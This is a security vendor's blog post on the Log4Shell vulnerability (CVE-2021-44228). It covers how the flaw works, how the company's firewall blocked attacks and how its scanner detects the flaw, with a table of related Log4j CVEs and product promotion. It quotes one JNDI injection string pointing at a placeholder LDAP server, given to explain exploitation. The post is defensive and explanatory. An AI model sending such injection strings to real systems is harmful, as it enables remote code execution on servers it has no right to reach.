Get a free application, infrastructure and malware scan report - Scan Your Website Now

Real-Time Protection of Log4j with AppTrana – Through its Risk-Based Approach

Posted DateDecember 20, 2021
Posted Time 4   min Read

With the discovery of Log4j vulnerability on December 9th (Also known as Log4shell), the cybersecurity world has gone on a tailspin. It is one of the most potent vulnerabilities identified in recent times. It is estimated that millions of systems were left exposed, resulting in large attempts by hackers to exploit the vulnerability. It is estimated more than a million attacks have been launched since the vulnerability was identified.

What is Log4j and Why is This Vulnerability So Potent?

Log4j is code written in Java programming language within Apache software foundation by volunteers. This free code creates a built-in log that developers can use to debug. It’s a utility and since it is free, is used by most web services built on Java for debugging purpose.

CVE-2021-44228 is a remote code execution (RCE) vulnerability in Apache Log4j 2.0 through 2.14.1. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable server. This can be done by submitting an exploit string on the text field found in the website running on the vulnerable server or by including the exploit string as part of the header destined to the vulnerable server.

If the server then is vulnerable to log4j, the exploit will request malicious code from the vulnerable server to a hacker-controlled server through Java naming and directory interface (JNDI) over a variety of services like LDAP.

On successful exploitation, malicious code will be downloaded on the vulnerable server and exploited, resulting in successful remote code execution.

This vulnerability can be executed by an unauthenticated user and depending on the nature of the malicious code downloaded, it can result in a hacker getting the complete control of the server.

How Did Indusface React?

Our security research team was immediately alerted about the vulnerability and they started researching about the available POC’s and how the vulnerability is being exploited in wild. By Dec 10th, we knew that it is one of the most potent vulnerabilities and something that can be exploited easily. Given the nature of this vulnerability, we immediately worked towards protecting all our customers by updating the core-protection of our AppTrana by Dec 11th to protect against the attacks caused by these vulnerabilities.

Since then, we have blocked thousands of requests that are trying to exploit this vulnerability across all the sites. Attacks are dispersed all over the world with major attacks seen from the United States.

Geographic Split of Attack

In total, we have seen about 1020 unique attacks on Log4jShell in the last 1 week.

Though we ensured that our AppTrana customers were immediately protected, we knew our customers would like to know if their servers are still vulnerable. So, our team was then tasked to ensure our DAST scanner could identify the vulnerability. Since it is an out-of-band vulnerability, i.e., the scanner will inject the attack vector, but it may not be called immediately and maybe called the next time Log4j is used by your application, it is not a straightforward approach to identify this vulnerability accurately. But our team worked overtime and deployed a plugin to detect this vulnerability by  Dec 17th.

Further Details on Log4j Detection:

The vulnerability, as mentioned earlier results from how the log messages are handled by the log4j processor. When an attacker passes a crafted message like ${jndi:ldap://<serveraddress>/a will result in a call to the remote LDAP server which can respond with a malicious code that can be executed in your server leading to successful remote code execution.

Log4j JNDI Attack

Source:  Swiss Government Computer Emergency Response Team

For detecting if the application is vulnerable, the scanner sends a crafted message to the application and if the application is vulnerable, the JNDI call will be made, which is then tracked and logged. If the call is made, we know the application is vulnerable, our intent is to identify this vulnerability, so, we do not respond back with a code and perform a successful RCE, but we report that your server is vulnerable to an RCE exploit.

Given that we provide an authenticated DAST scanner, we are able to find this vulnerability even if the area of exploit is behind a login page, which generally would not be found by a generic scanner doing black box scanning.

Risk-Based Approach

Since the release of the plugin, we have found that many of the sites behind AppTrana were vulnerable. Given the nature of the vulnerability, our managed services team reached out to the customer to inform the criticality of the vulnerability and the need to patch these vulnerabilities immediately. This way, though the application is protected through AppTrana, we ensured the customers know that their server is vulnerable, and they must take the mitigation steps to ensure they aren’t exposed accidentally in future

What About the Other Vulnerabilities on Log4j: 

Since the initial update on Dec 9th, multiple other vulnerabilities were reported on Log4j.

Here is the summary of where we stand,

CVE Type Affected Version Present in Default Config Likely hood of Exploit AppTrana Protection AppTrana Detection
CVE-2021-44228 RCE 2.0 through 2.14.1 Yes Very High Yes Yes
CVE-2021-45046 Denial of Service (DoS) and RCE 2.0 through 2.15.0 No Low Yes No – DOS/RCE cannot be covered because of intrusive checks
CVE-2021-4104 RCE 1.2* No Low Yes Yes
CVE-2021-45105 Denial of Service (DoS) 2.0-beta9 to 2.16.0 No Low Yes No – Will not be covered as this is intrusive check

Though other vulnerabilities are a concern, they are not widely exploitable. Our team is constantly working on updating the coverage for the same and we will keep this blog updated. So, stay tuned for more updates.

What Can You Do ?

If you are not sure that your application is vulnerable, please sign-up for Indusface WAS. Given the nature of this vulnerability, we have incorporated the detection for Log4jShell vulnerability in our basic plan which is free for life.

If you have challenges patching your server, we recommend you check out Indusface’s AppTrana which already has the protection for it, and you can start with an immediate free trial.

Found this article interesting? Follow Indusface on FacebookTwitter, and LinkedIn to read more exclusive content we post.

Indusface AppTrana

 

Vivek Gopalan

Vivekanand Gopalan is a seasoned entrepreneur and currently serves as the Vice President of Products at Indusface. With over 12 years of experience in designing and developing technology products, he has a keen eye for building innovative solutions that solve real-life problems. In his previous role as a Product Manager at Druva, Vivek was instrumental in creating the core endpoint data protection solution which helped over 1500 enterprises protect over a million endpoints. Prior to that, he served as a Product Manager at Zighra, where he played a crucial role in reducing online and offline payment fraud by leveraging mobile telephony, collective intelligence, and implicit user authentication. Vivek is a dynamic leader who enjoys building and commercializing products that bring tangible value to customers. In 2010, before pursuing MBA, he co-founded a technology product company, Warmbluke and created a first-of-its-kind innovative Civil Engineering estimator software called ATLAS. The software was developed for both enterprise and for SaaS users. The product helps in estimating the construction cost using CAD drawings. Vivek did his MBA from Queen's University with Specialization in New Ventures. He also holds a Bachelor of Technology degree in Information Technology from Coimbatore Institute of Technology, Anna University, one of the prestigious universities in India. He is the recipient of the D.D. Monieson MBA Award, Issued by Queen's School of Business, presented to a student team which has embraced the team-learning model and applied the management tools and skills to become a peer exemplar. In his spare time, Vivek likes to go on hikes and read books.

Share Article:

Join 51000+ Security Leaders

Get weekly tips on blocking ransomware, DDoS and bot attacks and Zero-day threats.

We're committed to your privacy. indusface uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.

Related Posts

log 4j vulnerabilities
Log4j Vulnerability – Technical Details

In December 2021, log4j aka CVE-2021-44228 was publicly released and rapidly was flagged as one of the most critical security vulnerabilities in recent years. This article will talk about this.

Read More
Log4j vulnerability
How to Tackle the Log4j Vulnerability?

Apache Log4j is an open-source logging package for Java distributed under the Apache Software License. Logging and tracing software, like Log4j, collects and stores activity records on a server.    A.

Read More
Apache Log4j Remote Code Execution Vulnerability
Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

What is Apache Log4j Remote Code Execution (CVE-2021-44228) Vulnerability? Log4j 2 is a logging library used in many Java applications and services. The library is part of the Apache Software.

Read More

AppTrana

Fully Managed SaaS-Based Web Application Security Solution

Get free access to Integrated Application Scanner, Web Application Firewall, DDoS & Bot Mitigation, and CDN for 14 days

Get Started for Free Request a Demo

Gartner

Indusface is the only cloud WAAP (WAF) vendor with 100% customer recommendation for 4 consecutive years.

A Customers’ Choice for 2024, 2023 and 2022 - Gartner® Peer Insights™

The reviews and ratings are in!